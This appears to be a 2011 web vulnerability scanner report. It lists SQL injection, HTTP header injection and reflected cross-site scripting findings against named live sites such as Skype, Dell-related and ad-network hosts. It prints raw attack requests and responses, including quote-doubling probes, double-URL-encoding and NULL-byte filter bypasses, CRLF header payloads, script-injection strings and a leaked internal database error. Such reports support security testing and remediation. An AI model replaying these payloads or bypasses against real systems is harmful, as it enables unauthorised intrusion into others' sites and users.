GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/user/viewprofilepage'/user-id/165958 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:46:29 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 36400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Page Not Fou ...[SNIP]... <link href="http://community.skype.com/t5/errors/error404page" rel="canonical"> ...[SNIP]...
Request 2
GET /t5/user/viewprofilepage''/user-id/165958 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/user%2527/viewprofilepage/user-id/59914 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:46:35 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 36402
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Page Not Fou ...[SNIP]... <link href="http://community.skype.com/t5/errors/error404page" rel="canonical"> ...[SNIP]...
Request 2
GET /t5/user%2527%2527/viewprofilepage/user-id/59914 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/user%2527/viewprofilepage/user-id/8 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:46:35 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 36404
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Page Not Fou ...[SNIP]... <link href="http://community.skype.com/t5/errors/error404page" rel="canonical"> ...[SNIP]...
Request 2
GET /t5/user%2527%2527/viewprofilepage/user-id/8 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.48. http://community.skype.com/t5/util/componentrenderpage/component-id/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/util/componentrenderpage/component-id/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/util/componentrenderpage/component-id/?1%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> An Unexpecte ...[SNIP]... <div class="exception-page-message RuntimeException lia-component-content" class="exception-page-message RuntimeException"> ...[SNIP]... <li> Sorry, your request failed. A notification has been sent to the development team for investigation.<p> ...[SNIP]...
Request 2
GET /t5/util/componentrenderpage/component-id/?1%2527%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.49. http://search2.skype.com/search/search.cgi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://search2.skype.com
Path:
/search/search.cgi
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /search/search.cgi?query=xss&collection=skype-en&1'=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: search2.skype.com Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Response 1
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 18:17:41 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39998
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <!-- Meta --> <meta cha ...[SNIP]... <!-- Padre error status: 2 --> ...[SNIP]...
Request 2
GET /search/search.cgi?query=xss&collection=skype-en&1''=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: search2.skype.com Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Response 2
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 18:17:43 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40007
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <!-- Meta --> <meta cha ...[SNIP]...
2. HTTP header injectionpreviousnext There are 2 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the k_clickid request parameter is copied into the Location response header. The payload 27af3%0d%0a1445eb0004d was submitted in the k_clickid parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=27af3%0d%0a1445eb0004d&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1 Host: 142.xg4ken.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 16:18:45 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:45 GMT; path=/; domain=.xg4ken.com Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=27af3 1445eb0004d P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
2.2. http://142.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://142.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 28e5e%0d%0ae9747ada840 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinfle/28e5e%0d%0ae9747ada840xion HTTP/1.1 Host: 142.xg4ken.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 16:18:46 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:46 GMT; path=/; domain=.xg4ken.com Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=infle/28e5e e9747ada840xion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
3. Cross-site scripting (reflected)previousnext There are 135 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75be5"><script>alert(1)</script>698f01d1a56 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.2. http://afe.specificclick.net/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://afe.specificclick.net
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85163'-alert(1)-'d48efb024f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pasmc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ced'-alert(1)-'3b0145e93ed was submitted in the pasmc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 508d9'-alert(1)-'a737bccdbe7 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e718"><script>alert(1)</script>08a95dd801e was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39c75"><script>alert(1)</script>0189dd8aea9 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0 ...[SNIP]... y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D39c75"><script>alert(1)</script>0189dd8aea9http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189880" target="_blank"> ...[SNIP]...
3.7. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://afe.specificclick.net
Path:
/serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03eb"><script>alert(1)</script>7e59f800e4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0 ...[SNIP]... 53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&c03eb"><script>alert(1)</script>7e59f800e4f=1http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189887" target="_blank"> ...[SNIP]...
3.8. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://afe.specificclick.net
Path:
/serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3597"><script>alert(1)</script>b03c2c220a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0 ...[SNIP]... 53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&f3597"><script>alert(1)</script>b03c2c220a4=1" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"> ...[SNIP]...
3.9. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://afe.specificclick.net
Path:
/serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d07'-alert(1)-'6c52c7876e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 76146<script>alert(1)</script>7493ba11a6a was submitted in the &callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload a61d8<script>alert(1)</script>7791fa49f3c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload %001ed17<script>alert(1)</script>4582190b2ea was submitted in the ac parameter. This input was echoed as 1ed17<script>alert(1)</script>4582190b2ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 2522.1ed17<script>alert(1)</script>4582190b2ea AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br> ...[SNIP]...
The value of the st request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3dca'%3balert(1)//c47aa975679 was submitted in the st parameter. This input was echoed as a3dca';alert(1)//c47aa975679 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI " Vary: Accept-Encoding Content-Length: 251 Date: Sun, 04 Sep 2011 16:19:18 GMT Connection: close Cache-Control: public, max-age=21600
var DELL = window.DELL || {}; DELL.com = DELL.com || {}; DELL.com.Resources = DELL.com.Resources||{}; var sary=DELL.com.Resources['thundera-ui-jsa3dca';alert(1)//c47aa975679']=[]; for(var i=0;i<sary.length;i++){sary[sary[i].Key]=sary[i].Value}
The value of the ac request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abad5"%3b1a7a9ffcd44 was submitted in the ac parameter. This input was echoed as abad5";1a7a9ffcd44 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /engine.php?ac=2522abad5"%3b1a7a9ffcd44 HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 16:19:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: private P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: Accept-Encoding,User-Agent Content-Length: 5637 Connection: close Content-Type: application/x-javascript
var SCS_tid=(SCS_tid)?escape(SCS_tid):"",NS_do=new Array('cymphonix.com'),NS_fe=new Array('exe','pdf','zip','wav','mp3','mov','mpg','avi','wmv','doc','xls','wpd','ppt','swf','mpeg','gif','jpg','tar',' ...[SNIP]... ,NS_ev=0,NS_la="",NS_js="Undetermined",NS_pn=(NS_pn)?escape(NS_pn):"",NS_vpn=(NS_vpn)?escape(NS_vpn):"",NS_uuid=(NS_uuid)?escape(NS_uuid):"",NS_pt=(document.title)?escape(document.title):"",NS_ac="2522abad5";1a7a9ffcd44",NS_c=(NS_c)?NS_c:"yes",NS_rn=Math.round(Math.random()*(99999-1))+1,NS_ru=document.referrer,NS_vp=(typeof (document.location)!="undefined")?document.location:"",NS_dobj=new Date(),NS_sw=(screen.width) ...[SNIP]...
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 24b83<script>alert(1)</script>22cc2cf8cfc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the profile.catid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2eb52'%3balert(1)//dfc1fb26081 was submitted in the profile.catid parameter. This input was echoed as 2eb52';alert(1)//dfc1fb26081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the profile.pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7cbb'%3balert(1)//6aaa9f386df was submitted in the profile.pn parameter. This input was echoed as e7cbb';alert(1)//6aaa9f386df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
